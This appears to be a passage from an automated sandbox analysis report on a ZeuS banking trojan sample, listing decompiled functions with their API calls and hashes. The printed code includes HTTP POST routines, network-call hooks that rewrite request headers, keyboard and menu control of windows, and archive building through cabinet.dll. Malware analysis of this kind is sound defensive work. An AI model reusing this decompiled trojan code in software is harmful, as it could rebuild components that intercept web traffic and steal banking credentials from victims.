						if(HttpQueryInfoA(_t97, 0x20000013,  &_a4,  &_v12, 0) != 1 || _a4 != 0xc8) {
							goto L21;
						} else {
							if(E0040731C( &_v12, _t97) != 0) {
								E004051E6(_t80);
							}
							E004051E6(_v36);
							E004051E6(_v32);
							 *(_t110 + 8) = _v16;
							goto L25;
						}
					}
				}
			}

APIs
    • Part of subcall function 00409C4B: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00409C7A
  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 004126E3
  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00412701
  • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0041274C
  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004127A1
  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00412815
  • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00412837
  • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041285B
  • InternetCloseHandle.WININET(00000000), ref: 0041289B
  • InternetCloseHandle.WININET(?), ref: 004128A4
    • Part of subcall function 0040731C: InternetQueryOptionA.WININET(00000000,00000022,00000000,000000C8), ref: 00407330
    • Part of subcall function 0040731C: GetLastError.KERNEL32 ref: 0040733A
    • Part of subcall function 0040731C: InternetQueryOptionA.WININET(00000022,00000022,00000000,000000C8), ref: 0040735A
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • InternetCloseHandle.WININET(?), ref: 004128AD
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
  • String ID: GET$HTTP/1.1$POST
  • API String ID: 1023423486-2753618334
  • Opcode ID: ea349e37b470a2333f2700bd55168c120a9986c392f984e3321c633f36e8ef20
  • Instruction ID: c7486255c6e3e7712db06eeed57dd6127339dd2851a6dfc3edae1dc3710d4599
  • Opcode Fuzzy Hash: ea349e37b470a2333f2700bd55168c120a9986c392f984e3321c633f36e8ef20
  • Instruction Fuzzy Hash: B9519C72800115BBCF11ABA1DE49EDFBF79EF48354F104126F505F62A1CB389A90DBA8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 95%
			E0040D88C(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x423248);
					L23:
					SetEvent( *0x423244);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E00417275( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x423238, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x423248;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}
APIs
  • GetMenu.USER32(?), ref: 0040D8B6
  • GetMenuItemCount.USER32 ref: 0040D8CC
  • GetMenuState.USER32 ref: 0040D8E4
  • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040D8F4
  • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040D91A
  • GetMenuState.USER32 ref: 0040D92E
  • EndMenu.USER32 ref: 0040D93E
  • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040D94E
  • GetSubMenu.USER32 ref: 0040D972
  • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040D98C
  • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040D9AD
  • GetMenuItemID.USER32(00000000,00000000), ref: 0040D9C5
  • SendMessageW.USER32(?,00000111,?,00000000), ref: 0040D9DE
  • SetKeyboardState.USER32 ref: 0040DA1D
  • SetEvent.KERNEL32 ref: 0040DA29
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
  • String ID:
  • API String ID: 751066993-0
  • Opcode ID: c770205009bb6f800fd79cd5e676fa3caccac14cab55f9b1c3c9498a3c816af1
  • Instruction ID: 3a614a910883821af988345181461a7b175372144327621c3ca52653278fd11a
  • Opcode Fuzzy Hash: c770205009bb6f800fd79cd5e676fa3caccac14cab55f9b1c3c9498a3c816af1
  • Instruction Fuzzy Hash: FB410170604305AFDB109F69DD48E7B7EB8EB85760F00063AF995B11F0C3388949DBA9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 100%
			E00408ECC() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t16;
				intOrPtr _t18;

				if( *0x4231b4 != 0) {
					L9:
					 *0x4231b4 =  *0x4231b4 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x4231b0 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x4227dc = GetProcAddress(_t2, "FCICreate");
						 *0x4231a0 = GetProcAddress( *0x4231b0, "FCIAddFile");
						 *0x4223d4 = GetProcAddress( *0x4231b0, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x4231b0, "FCIDestroy");
						 *0x4231a8 = _t7;
						_t16 =  *0x4227dc; // 0x0
						if(_t16 == 0 ||  *0x4231a0 == 0) {
							L7:
							FreeLibrary( *0x4231b0);
							goto L8;
						} else {
							_t18 =  *0x4223d4; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x4223d0 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}
APIs
  • LoadLibraryA.KERNEL32(cabinet.dll,00000000,00408FB3,?,004091CF,?), ref: 00408EE0
  • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00408F00
  • GetProcAddress.KERNEL32(FCIAddFile), ref: 00408F12
  • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00408F24
  • GetProcAddress.KERNEL32(FCIDestroy), ref: 00408F36
  • HeapCreate.KERNEL32(00000000,00080000,00000000,?,004091CF,?), ref: 00408F61
  • FreeLibrary.KERNEL32(?,004091CF,?), ref: 00408F76
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: AddressProc$Library$CreateFreeHeapLoad
  • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
  • API String ID: 2040708800-1163896595
  • Opcode ID: a1c818729c423b2a45dca89a8c706205393ec7e888e7b8551b47c21d90e2d254
  • Instruction ID: 928e74d1de24a7aa68b2efb95a563f825ce651d431d217c1fd235f185c0fd675
  • Opcode Fuzzy Hash: a1c818729c423b2a45dca89a8c706205393ec7e888e7b8551b47c21d90e2d254
  • Instruction Fuzzy Hash: 0411FE30B04750AAD7319F35AE44A267EB6F788752398027BE940E2264DB7D1596DA0C
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
C-Code - Quality: 81%
			E00410310(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v128;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;

				if(E0041CAA4() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x4233c4(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x4233d4);
					_t192 = _a4;
					_t184 = E0040F394(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x4233d4);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x4233f0;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x4233d4);
						_t195 = _a4;
						_t114 =  *0x4233c4(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x4233d4);
							_t115 = E0040F394(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x4233f0;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4338644
									_v88 =  *(_t117 + 0x28);
									E00405299(E004051E6( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x4233d0(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4233d4);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x4233d4);
						_t197 = _a4;
						_t121 =  *0x4233c4(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x4233d4);
							_t122 = E0040F394(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x4233f0;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E0040F452(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x4233d0(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4233d4);
						}
						goto L36;
					}
					_t125 = E0040F888( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E00412628( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E00411CFA( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00405239(__eflags, _a8, _a12);
								_v100 = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E00412692( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E004051E6( *(_t186 + 0x14));
									E004051E6( *((intOrPtr*)(_t186 + 4)));
									_t149 = E00405644(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) = _v32;
									_v128 = E0040A114(E0040A114(E0040A190(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E00412692(_v16, _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E00412628( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E0040FB68(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E004051E6(_v56);
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E004051E6(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E00412628( &_v76);
							LeaveCriticalSection(0x4233d4);
							_t111 =  *0x4233d0(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E0040F452(_v84);
						E00412628( &_v76);
						goto L8;
					}
				}
			}
APIs
    • Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC
  • EnterCriticalSection.KERNEL32(004233D4), ref: 00410337
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 00410395
  • LeaveCriticalSection.KERNEL32(004233D4,?), ref: 004103DC
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 00410547
  • EnterCriticalSection.KERNEL32(004233D4), ref: 00410566
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 004105C8
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 004105F1
  • EnterCriticalSection.KERNEL32(004233D4), ref: 00410610
  • LeaveCriticalSection.KERNEL32(004233D4), ref: 00410658
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
  • String ID: Accept-Encoding$If-Modified-Since$identity
  • API String ID: 3286975823-3034467039
  • Opcode ID: e925a551951c226e26fa85d5d84b2f67f69ed88fd9109a886857c9a6f05ed017
  • Instruction ID: b8f3efee3db3d8e0af21727fccdc382b39fd359433b903162946265aa5c6dc80
  • Opcode Fuzzy Hash: e925a551951c226e26fa85d5d84b2f67f69ed88fd9109a886857c9a6f05ed017
  • Instruction Fuzzy Hash: CCA19E71504305AFCB10DF24DD45A8EBBA0FF48314F104A2EF854A72A1C778EA95CF9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040D5C5(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E00406BF5( &(_t41[0x5f]));
				}
				return _t20;
			}
APIs
  • DeleteObject.GDI32(?), ref: 0040D5D8
  • CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D5E8
  • TlsFree.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D5F3
  • CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D601
  • UnmapViewOfFile.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D60B
  • CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D618
  • SelectObject.GDI32(?,?), ref: 0040D632
  • DeleteObject.GDI32(?), ref: 0040D643
  • DeleteDC.GDI32(?), ref: 0040D650
  • CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 0040D661
  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 0040D670
  • PostThreadMessageW.USER32 ref: 0040D689
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
  • String ID:
  • API String ID: 1699860549-0
  • Opcode ID: f396bb5945c7fe3e9d2402feee4b908d53d3bf093df6cfaefad1267cdca6ba83
  • Instruction ID: 876141d26749e0381eb70f9b61fdf6621606b19fad2962aca518afe07c4fd577
  • Opcode Fuzzy Hash: f396bb5945c7fe3e9d2402feee4b908d53d3bf093df6cfaefad1267cdca6ba83
  • Instruction Fuzzy Hash: ED21DC70A00701ABD7209BB9DD48F57B3ECAF54741F04493AB95AF73E0DB39E8458A28
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00416818(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				if(E004166FD( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00412628( &_v76);
					return _v120;
				}
				_t85 = E00411CFA( &_v76);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x423420;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E00415D7F(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E004051E6( *((intOrPtr*)(_t148 +  *0x423438 + 8)));
							 *((intOrPtr*)(_t148 +  *0x423438 + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E00415DA5(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E0040F314(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E0040F314(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E0040F314(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x423420;
						EnterCriticalSection(0x423420);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E00412692(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E00406E73(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E00415D7F(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t142 = _t107 * 0x24;
							E00412692( *((intOrPtr*)( *0x423438 + _t142 + 0x10)),  *((intOrPtr*)( *0x423438 + _t142 + 0xc)));
							E004051E6( *(_t142 +  *0x423438 + 0x14));
							 *(_t142 +  *0x423438 + 0x14) =  *(_t142 +  *0x423438 + 0x14) & 0x00000000;
							 *(_t142 +  *0x423438 + 0x1c) =  *(_t142 +  *0x423438 + 0x1c) & 0x00000000;
							 *(_t142 +  *0x423438 + 0x18) =  *(_t142 +  *0x423438 + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t142 +  *0x423438 + 0xc)) = _v76;
							 *((intOrPtr*)(_t142 +  *0x423438 + 0x10)) = _v72;
							 *((intOrPtr*)(_t142 +  *0x423438 + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E00415DA5(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E004128CC(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}
APIs
    • Part of subcall function 00411CFA: EnterCriticalSection.KERNEL32(004233FC,-004233F0,00000000,004233D4), ref: 00411D15
    • Part of subcall function 00411CFA: LeaveCriticalSection.KERNEL32(004233FC), ref: 00411D98
  • SetLastError.KERNEL32(00002F78,?), ref: 0041685F
  • EnterCriticalSection.KERNEL32(00423420), ref: 00416906
  • LeaveCriticalSection.KERNEL32(00423420,?), ref: 004169BC
  • EnterCriticalSection.KERNEL32(00423420,?), ref: 004169E3
  • LeaveCriticalSection.KERNEL32(00423420,?), ref: 00416A23
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CriticalSection$EnterLeave$ErrorLast
  • String ID: 4B$ 4B
  • API String ID: 486337731-3689678258
  • Opcode ID: 365eb3edd9b9a29c7e2d8125040c7c6f7194fa81bad14f932ca3c1b3a97524d1
  • Instruction ID: f56de27dbbc9443557d8be41068a7372b31fea881476e6052ba41ca65e92dbec
  • Opcode Fuzzy Hash: 365eb3edd9b9a29c7e2d8125040c7c6f7194fa81bad14f932ca3c1b3a97524d1
  • Instruction Fuzzy Hash: 7B519130114341ABC721EF29D884A9ABBE4FF85368F504A6EF864972F1C738D985CB59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00417A56(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E0040D2F3(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t7 = _t85 + 0x50; // 0x50
					_t9 = _t85 + 0x3c; // 0x3c
					_t86 =  &_v140;
					E0040983F( &_v140, _t9, _v12, _t7, 2);
					_v5 = E004089C9( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E004178F4(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E00405222( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						_t35 = _t85 + 0x17c; // 0x17c
						TerminateProcess( *_t35, 0);
						E00406BF5(_t35);
						goto L14;
					}
